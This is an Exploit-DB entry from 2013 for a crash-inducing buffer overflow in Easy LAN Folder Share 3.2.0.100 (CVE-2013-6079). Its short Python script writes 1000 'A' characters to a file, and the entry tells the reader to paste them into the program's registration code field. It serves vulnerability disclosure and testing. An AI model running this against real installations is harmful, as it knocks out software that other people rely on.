Easy LAN Folder Share 3.2.0.100 - Buffer Overflow

Author: ariarat
type: dos
platform: windows
port: 
date_added: 2013-06-14  
date_updated: 2013-06-19  
verified: 1  
codes: OSVDB-94390;CVE-2013-6079  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt26500/screen-shot-2013-06-19-at-74105-am.png  
application_url: http://www.exploit-db.comEasyLanFolderShareSetup.exe  

raw file: 26214.py  
# Exploit Title: Easy LAN Folder Share Version 3.2.0.100 Buffer Overflow vulnerability(SEH)
# Date: 14-06-2013
# Exploit Author: ariarat
# Vendor Homepage: http://www.mostgear.com
# Software Link: http://download.cnet.com/Easy-LAN-Folder-Share/3000-2085_4-10909166.html
# Version: 3.2.0.100
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in "Register -> Activate License -> Registration Code" section.
# ** type any character in User Name text field.
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()